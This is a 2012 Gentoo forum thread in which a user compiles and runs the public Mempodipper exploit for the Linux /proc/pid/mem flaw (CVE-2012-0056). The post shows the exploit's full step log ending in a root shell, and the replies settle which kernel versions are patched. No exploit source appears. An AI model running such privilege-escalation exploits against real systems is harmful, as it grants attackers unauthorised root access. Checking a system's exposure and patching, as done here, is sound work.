# mempodipper - root exploit [CVE-2012-0056] [SOLVED]

## upengan78

More info:

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=e268337dfe26dfc7efd422a804dbb27977a3cccc

On my gentoo -

 3.0.3-gentoo #2 SMP PREEMPT Fri Oct 7 11:22:18 CDT 2011 x86_64 Intel(R) Core(TM)2 CPU 6400 @ 2.13GHz GenuineIntel GNU/Linux

```
user@hostname:/nfs1 $ 12:08 PM]gcc -o mempodipper mempodipper.c

user@hostname:/nfs1 $ 12:08 PM]./mempodipper 

===============================

=          Mempodipper        =

=           by zx2c4          =

=         Jan 21, 2012        =

===============================

[+] Ptracing su to find next instruction without reading binary.

[+] Creating ptrace pipe.

[+] Forking ptrace child.

[+] Waiting for ptraced child to give output on syscalls.

[+] Ptrace_traceme'ing process.

[+] Error message written. Single stepping to find address.

[+] Resolved call address to 0x402240.

[+] Opening socketpair.

[+] Waiting for transferred fd in parent.

[+] Executing child from child fork.

[+] Opening parent mem /proc/12838/mem in child.

[+] Sending fd 6 to parent.

[+] Received fd at 6.

[+] Assigning fd 6 to stderr.

[+] Calculating su padding.

[+] Seeking to offset 0x402234.

[+] Executing su with shellcode.

sh-4.1# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),7(lp),10(wheel),18(audio),35(games),1015(qemu)

sh-4.1#uname -a

3.0.3-gentoo #2 SMP PREEMPT Fri Oct 7 11:22:18 CDT 2011 x86_64 Intel(R) Core(TM)2 CPU 6400 @ 2.13GHz GenuineIntel GNU/Linux
```

Last edited by upengan78 on Wed Jan 25, 2012 7:42 pm; edited 1 time in total

----------

## avx

Yeah, umh? Update your kernel, the recent versions (3.1, 3.2.1) are already patched.

----------

## upengan78

Thanks. I tried 3.1.6 and exploit worked on it. So put 3.2.1-gentoo-r2 and all is good now.

----------

